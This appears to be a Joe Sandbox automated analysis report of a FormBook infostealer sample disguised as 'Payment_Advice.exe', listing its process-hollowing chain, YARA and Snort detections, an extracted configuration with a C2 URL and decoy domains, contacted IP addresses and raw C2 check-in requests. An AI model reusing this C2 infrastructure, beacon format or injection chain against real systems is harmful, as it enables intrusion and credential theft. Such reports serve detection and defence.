Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment_Advice.exe

Overview

General Information

Sample Name:Payment_Advice.exe
Analysis ID:1320960
MD5:15b3674e7fe8c5fe5284bc290a09ecb8
SHA1:222c994082583413a9ea054eaf41583712702a53
SHA256:eb53ed1886ae853bdeb51270964242b2b03373388e65acc012c8fe0485b81514
Tags:exeFormbookPayment
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM autoit script
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Sample uses process hollowing technique
Writes to foreign memory regions
Modifies the prolog of user mode functions (user mode inline hooks)
Contains functionality to modify clipboard data
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found API chain indicative of sandbox detection
Found decision node followed by non-executed suspicious APIs
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality to simulate keystroke presses
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
OS version to string mapping found (often used in BOTs)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to execute programs as a different user
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Process Tree

  • System is w10x64
  • Payment_Advice.exe (PID: 1288 cmdline: C:\Users\user\Desktop\Payment_Advice.exe MD5: 15B3674E7FE8C5FE5284BC290A09ECB8)
    • wscript.exe (PID: 6152 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pis-e.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2564 cmdline: "C:\Windows\System32\cmd.exe" /c ewdbwwfpdh.bmp fjrpidauk.jpg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ewdbwwfpdh.bmp (PID: 6052 cmdline: ewdbwwfpdh.bmp fjrpidauk.jpg MD5: 874798CB576E238642281B10189B031C)
          • RegSvcs.exe (PID: 4136 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
          • RegSvcs.exe (PID: 6108 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
            • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
              • cmd.exe (PID: 636 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • cmd.exe (PID: 4424 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 4428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3352 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 3232 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.jimenezfarmersinsurance.shop/hesf/"], "decoy": ["rizublog-aromama-a.com", "87b52.club", "allportablepower.com", "brownkrosshui.com", "schuobu.fun", "qevtjrobrb.xyz", "throne-rooms.com", "hostcheker.net", "buzztsunamiloja.com", "kkudatogel27.com", "91fulizifen.com", "148secretbet.com", "outlookthailand.com", "zonaduniabet.net", "boursobankk.com", "tuneuphypnosis.com", "sahabatzulhelmi.com", "usbulletinnow.com", "durdurdarshi.com", "zz-agency.com", "jf66899j.com", "artplex.store", "beautyhubaustralia.site", "tygyro.com", "ludio.biz", "ruochen.xyz", "smartvoiceinsurance.com", "shayun.net", "poston.app", "othersidewear.com", "620tom.com", "100mileview.info", "wedding-nanny.com", "betadda777.online", "passiveprofitsathome.com", "tobivausm.party", "171301.com", "sua-tang-chieu-cao-hiup.top", "pancakesandwaflesbeverages.net", "sahilsachdevaapps.app", "home-workout-ideas.com", "allpaleoclimb24.com", "vkcardrivingschool.com", "claimfine.com", "im-newbie-journal.online", "ybring7.com", "svgco.life", "joeysdoor.com", "elixirsiroptonic.com", "1320detailingsupplies.com", "olimcreative.com", "trinityoutboards.com", "zerofeelettings.com", "pendletonofficial.shop", "carneywaste.com", "schistdisc.com", "neomusic.net", "blackberrygrove.com", "homespy.net", "gdbushuo.icu", "luxury111mb.com", "akumaterial.com", "drakenskloof.com", "px6k4a.shop"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 55 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      14.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        14.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          14.2.RegSvcs.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          14.2.RegSvcs.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          14.2.RegSvcs.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18809:$sqlite3step: 68 34 1C 7B E1
          • 0x1891c:$sqlite3step: 68 34 1C 7B E1
          • 0x18838:$sqlite3text: 68 38 2A 90 C5
          • 0x1895d:$sqlite3text: 68 38 2A 90 C5
          • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.8142.234.186.9849713802031412 10/06/23-15:46:24.770092
          SID:2031412
          Source Port:49713
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.8170.33.13.24649714802031412 10/06/23-15:47:05.527481
          SID:2031412
          Source Port:49714
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.875.2.115.19649721802031412 10/06/23-15:48:47.739146
          SID:2031412
          Source Port:49721
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.891.195.240.1949715802031412 10/06/23-15:47:26.584409
          SID:2031412
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.866.96.160.14049719802031412 10/06/23-15:48:06.495640
          SID:2031412
          Source Port:49719
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.877.222.40.14749711802031412 10/06/23-15:46:05.442049
          SID:2031412
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.862.72.50.24449716802031412 10/06/23-15:47:46.016751
          SID:2031412
          Source Port:49716
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.8103.224.182.24249720802031412 10/06/23-15:48:27.268039
          SID:2031412
          Source Port:49720
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.jimenezfarmersinsurance.shop/hesf/"], "decoy": ["rizublog-aromama-a.com", "87b52.club", "allportablepower.com", "brownkrosshui.com", "schuobu.fun", "qevtjrobrb.xyz", "throne-rooms.com", "hostcheker.net", "buzztsunamiloja.com", "kkudatogel27.com", "91fulizifen.com", "148secretbet.com", "outlookthailand.com", "zonaduniabet.net", "boursobankk.com", "tuneuphypnosis.com", "sahabatzulhelmi.com", "usbulletinnow.com", "durdurdarshi.com", "zz-agency.com", "jf66899j.com", "artplex.store", "beautyhubaustralia.site", "tygyro.com", "ludio.biz", "ruochen.xyz", "smartvoiceinsurance.com", "shayun.net", "poston.app", "othersidewear.com", "620tom.com", "100mileview.info", "wedding-nanny.com", "betadda777.online", "passiveprofitsathome.com", "tobivausm.party", "171301.com", "sua-tang-chieu-cao-hiup.top", "pancakesandwaflesbeverages.net", "sahilsachdevaapps.app", "home-workout-ideas.com", "allpaleoclimb24.com", "vkcardrivingschool.com", "claimfine.com", "im-newbie-journal.online", "ybring7.com", "svgco.life", "joeysdoor.com", "elixirsiroptonic.com", "1320detailingsupplies.com", "olimcreative.com", "trinityoutboards.com", "zerofeelettings.com", "pendletonofficial.shop", "carneywaste.com", "schistdisc.com", "neomusic.net", "blackberrygrove.com", "homespy.net", "gdbushuo.icu", "luxury111mb.com", "akumaterial.com", "drakenskloof.com", "px6k4a.shop"]}
          Multi AV Scanner detection for submitted file
          Source: Payment_Advice.exeReversingLabs: Detection: 44%
          Source: Payment_Advice.exeVirustotal: Detection: 48%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpReversingLabs: Detection: 13%
          Source: Payment_Advice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Payment_Advice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Payment_Advice.exe
          Source: Binary string: RegSvcs.pdb, source: explorer.exe, 0000000F.00000002.3891932584.00000000122AF000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000010.00000002.3842961223.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3848016870.0000000003C9F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.1648193337.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000003.1648028584.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000003.1649872985.00000000035A6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3844385329.0000000003750000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3844385329.00000000038EE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: RegSvcs.exe, 0000000E.00000002.1648104707.0000000001640000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, 00000010.00000002.3842017169.0000000000A40000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.1648193337.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, cmd.exe, 00000010.00000003.1648028584.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000003.1649872985.00000000035A6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3844385329.0000000003750000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3844385329.00000000038EE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb source: explorer.exe, 0000000F.00000002.3891932584.00000000122AF000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000010.00000002.3842961223.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.3848016870.0000000003C9F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: cmd.pdb source: RegSvcs.exe, 0000000E.00000002.1648104707.0000000001640000.00000040.10000000.00040000.00000000.sdmp, cmd.exe, cmd.exe, 00000010.00000002.3842017169.0000000000A40000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0050A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0050A69B
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0051C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0051C220
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0052B348 FindFirstFileExA,0_2_0052B348
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001DE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,6_2_001DE387
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001EA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_001EA0FA
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001EA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_001EA488
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001E65F1 FindFirstFileW,FindNextFileW,FindClose,6_2_001E65F1
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001AC642 FindFirstFileExW,6_2_001AC642
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001E7248 FindFirstFileW,FindClose,6_2_001E7248
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001E72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,6_2_001E72E9
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001DD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_001DD836
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001DDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_001DDB69
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001E9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_001E9F9F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A5589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,16_2_00A5589A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A54EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,16_2_00A54EC1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A50207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,16_2_00A50207
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A63E66 FindFirstFileW,FindNextFileW,FindClose,16_2_00A63E66
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A4532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,16_2_00A4532E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop esi14_2_004172CE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop ebx14_2_00407B1A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi14_2_00417CFF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi14_2_00417CB6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop esi16_2_02B672CE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop ebx16_2_02B57B1A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi16_2_02B67CB6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi16_2_02B67CFF

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 77.222.40.147 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.160.140 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 170.33.13.246 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 142.234.186.98 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.182.242 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.19 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 62.72.50.244 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.115.196 80Jump to behavior
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49711 -> 77.222.40.147:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49713 -> 142.234.186.98:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49714 -> 170.33.13.246:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49715 -> 91.195.240.19:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49716 -> 62.72.50.244:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49719 -> 66.96.160.140:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49720 -> 103.224.182.242:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49721 -> 75.2.115.196:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.jimenezfarmersinsurance.shop/hesf/
          Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=szcn2kpEQ6L2Syu9mG2pKozAyrZLMpz3ThmLak2r9KpoKfLz6EjH9XrJVzpw+e6nWP1B&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.othersidewear.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=d2AGz1H3YsI9kghQJOJ7DZyuiCPgqoB+sSxuqf6m27exoGivXrHz5sUA11+t0RjRixK2&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.91fulizifen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=rBBm79yWj/0scTu35nBTjefHB3yHFR/9uN8IXoi0DRbgMbd2cnMvsZYXFupsHQ3mqy7J&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.shayun.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=Zexu6rzcFbxF4r/yRE1P6uhuDniKqQl2K3Z2GVMnXCfVfpJX9615KGPJ2pRkkggZfWm9&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.brownkrosshui.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=p36eIKN5Lwa/8BGKFMSG6AYkxDDJkwu9kGEjCpPHv7kROoaFrm0HZc0Jy9RwJeFaeZw5&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.usbulletinnow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=bZ0cL2W3356ZdQMSZx0hbFAlBxxbFCW9aXPVjCHIIl88pIGO5acXFwKQ6PqG5/DWthgZ&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.im-newbie-journal.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hesf/?jBZ=C6m+T/QSDYRxkia6wo2b10sg9WxaAAR9Ewn+rwYRRUW3VljC+LgrolCw9oI9hSyVjjh+&Gvw=T4RpitPpFtBLx HTTP/1.1Host: www.tygyro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
